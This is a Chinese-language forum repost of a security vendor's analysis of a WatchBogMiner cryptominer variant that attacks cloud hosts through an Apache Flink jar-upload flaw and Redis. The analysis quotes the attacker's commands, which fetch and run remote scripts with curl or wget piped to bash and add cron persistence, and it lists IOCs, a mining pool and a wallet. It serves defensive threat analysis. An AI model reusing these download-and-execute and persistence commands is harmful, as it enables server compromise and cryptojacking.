切换到宽版

中国黑防联盟

查看: 211|回复: 8

腾讯主机安全(云镜)捕获 WatchBogMiner 挖矿木马新变种,利用 Apache Flink 漏洞攻击云主机

[复制链接]
发表于 2020-10-28 23:49:47 | |阅读模式
感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg

一、概述

腾讯主机安全(云镜)捕获WatchBogMiner挖矿木马最新变种对云主机的攻击,该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机,然后下载文件名为“watohdog”的门罗币挖矿木马。
该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名,将其命名为“Watchbog”挖矿木马。
腾讯安全近期检测到“Watchbog”挖矿木马的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播,根据其算力推测,该变种已控制约8000台服务器挖矿,挖矿收益折合人民币约1.2万元。
腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下:

应用场景安全产品解决方案
 威胁情报腾讯T-Sec</p>威胁情报云查服务
(SaaS)
1)WatchBogMiner黑产团伙相关IOCs已入库。
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
腾讯T-Sec
高级威胁追溯系统
1)WatchBogMiner黑产团伙相关信息和情报已支持检索。
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
云原生安全防护云防火墙
(Cloud Firewall,CFW)
基于网络流量进行威胁检测与主动拦截,已支持检测:
1)WatchBogMiner关联的IOCs;
2)Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)  ;
3)Supervisord远程命令执行漏洞(CVE-2017-11610);
4)ThinkPHP远程命令执行漏洞;
5)Apache FLink未授权上传jar包远程代码执行漏洞;
6)Redis未授权访问漏洞。

有关云防火墙的更多信息,可参考:https://cloud.tencent.com/product/cfw
腾讯T-Sec  主机安全
(Cloud Workload Protection,CWP)
腾讯主机安全(云镜)已支持检测:
1)WatchBogMiner相关木马程序;
2)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ;
3)Supervisord远程命令执行漏洞(CVE-2017-11610);
4)ThinkPHP远程命令执行漏洞;
5)Apache FLink未授权上传jar包远程代码执行漏洞;
6)Redis未授权访问漏洞。

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
腾讯T-Sec 安全运营中心基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
非云企业安全防护腾讯T-Sec
高级威胁检测系统
(腾讯御界)
腾讯御界基于网络流量进行威胁检测,已支持检测:
1)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ;
2)Supervisord远程命令执行漏洞(CVE-2017-11610);
3)ThinkPHP远程命令执行漏洞;
4)Apache FLink未授权上传jar包远程代码执行漏洞;
5)Redis未授权访问漏洞。


关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta
二、详细分析

Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
2019年11月Aapche Flink被爆出漏洞,攻击者可直接在Apache Flink中上传任意jar包,从而达到远程代码执行的目的。漏洞POC代码已被公开:https://github.com/LandGrey/flink-unauth-rce
攻击者首先利用Flink漏洞上传恶意jar包:

然后执行远程命令:
/bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash其中ddxox.png代码:
nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &rm -rf /tmp/seele*sghbw.png代码:
(curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash最终执行的afhpo.png首先定义三个变量house、park、room house=http[:]//nabladigital.biz/img/ddxox.png park= https[:]//files.catbox.moe/5j9zcz room= https[:]//a.pomf.cat/wariie
然后crontab命令创建定时任务,每10分钟下载执行一次以上脚本:
(crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab –通过写入以下文件创建定时任务: /etc/cron.d/root /etc/cron.d/system /etc/cron.d/apache /var/spool/cron/crontabs/root /var/spool/cron/root

接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png,base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog(之前的版本,该文件名为watchbog)。

watohdog是XMRig经过修改编译的挖矿程序。

矿池:104.140.201.42:3333
钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo
Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd
收益:已挖矿获得门罗币13.82XMR,折合人民币约1.2万元。平均算力103 KH/s,以此推算Watchbog最新变种已控制约8000台服务器挖矿。



IOCs

Domain

nabladigital.biz
URL

http[:]//nabladigital.biz/img/ddxox.png
http[:]//nabladigital.biz/img/sghbw.png
http[:]//nabladigital.biz/img/afhpo.png
http[:]//nabladigital.biz/img/qczgb.png
https[:]//files.catbox.moe/5j9zcz
https[:]//a.pomf.cat/wariie
MD5

Watohdog 1df8307ae2d2524628b1322ac864d96c
ddxox.png 791e8ecf4dee71dd0e0da129b938258f
sghbw.png ef5323cac300f68fb77ac23c39236bf2
afhpo.png 9ef94e8b41893c4b1a85c327a3bcae3f
钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo
Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd


参考链接:

1. Apache Flink任意Jar包上传导致远程代码执行 https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag
2. Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 https://cloud.tencent.com/developer/article/1544254
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-3-31 21:39:54 |
永远支持中国黑防联盟:www.vcs6.com
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-4-21 06:39:13 |
永远支持中国黑防联盟论坛的发展,支持楼主!
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-5-3 10:07:15 |
感谢分享,完美
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-5-4 03:45:20 |
感谢分享,有用!
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-7-11 12:23:43 |
楼主,不论什么情况你一定要hold住!hold住就是胜利!
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-7-13 01:36:55 |
立顶黑防、立顶楼主,希望黑防越办越好
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-8-12 11:30:20 |
感谢分享,收藏下载了
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-8-21 02:48:21 |
这个是好东东,收藏备用
永远支持中国黑防联盟论坛:www.vcs6.com
关闭

站长推荐上一条 /1 下一条

手机版|小黑屋|网站地图|( 蜀ICP备2020029785号 )

快速回复 返回顶部 返回列表